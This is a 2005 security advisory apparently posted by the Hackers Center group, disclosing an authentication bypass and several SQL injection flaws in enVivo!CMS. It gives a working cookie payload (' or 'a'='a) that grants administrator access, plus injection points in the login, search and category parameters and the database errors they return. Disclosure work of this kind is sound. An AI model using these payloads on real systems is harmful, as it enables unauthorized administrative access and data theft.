|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Friday, 29 April 2005 08:40 |
 Dcrab "s Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab"s Services to audit your Web servers, scripts, networks, etc.
Learn more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Authentication Bypass and Multiple Sql injections in enVivo!CMS
Date: 29/04/2004
Vendor: EnvivoSoft
Vendor Website: http://www.envivosoft.com/
Vendor Status: Vendor was notified but with no response yet.
Summary: There are, authentication bypass and multiple sql injections in
envivo!cms.
Proof of Concept Exploits:
http://localhost/envivo101/envivocms/admin_login.asp
AUTHENTICATION BYPASS
By setting both the cookie username and password values to a" or "a" = "a
you can get access to the administrative account for example,
Cookiename:101
Cookievalue:remStayLoggedIn=True&remPassword=a%27+or+%27a%27+%3D+%27a&remUserName=a%27+or+%27a%27+%3D+%27a
Result: Hello enVivo!CMS Classic Administrator (admin) - Content Awaiting
Approval
[CODE]
If Xe5c10c3X(Request.Cookies(CStr(INSTANCE_ID))("remUserName"),
Request.Cookies(CStr(INSTANCE_ID))("remPassword"),
Request.Cookies(CStr(INSTANCE_ID))("remStayLoggedIn")) Then
X4047377X = True
[/CODE]
http://localhost/envivo101/envivocms/admin_login.asp
SQL INJECTION
By setting the Username field to "SQL_INJECTION you get,
Microsoft JET Database Engine error "80040e14"
Syntax error (missing operator) in query expression "username = """ AND
pword =
"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"".
/envivo101/envivocms/envivoadminAPI.asp, line 3077
http://localhost/envivo101/default.asp?action=search&searchstring="SQL_INJECTION
SQL INJECTION
Microsoft JET Database Engine error "80040e14"
Syntax error (missing operator) in query expression "((articlespub.title
LIKE "%"SQL_INJECTION%" OR articlespub.abstract LIKE "%"SQL_INJECTION%" OR
articlespub.article LIKE "%"SQL_INJECTION%")) AND articlespub.releasetoweb
= 1 AND DATE() BETWEEN articlespub.startdate AND articlespub.enddate".
/envivo101/envivocms/envivodisplayAPIfunctions.asp, line 788
http://localhost/envivo101/default.asp?action=category&ID="SQL_ERROR
Microsoft VBScript runtime error "800a000d"
Type mismatch: "CLng"
/envivo101/envivocms/envivodisplayAPIfunctions.asp, line 42
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email:
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact
me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my
soon to come out book on Secure coding with php.
|
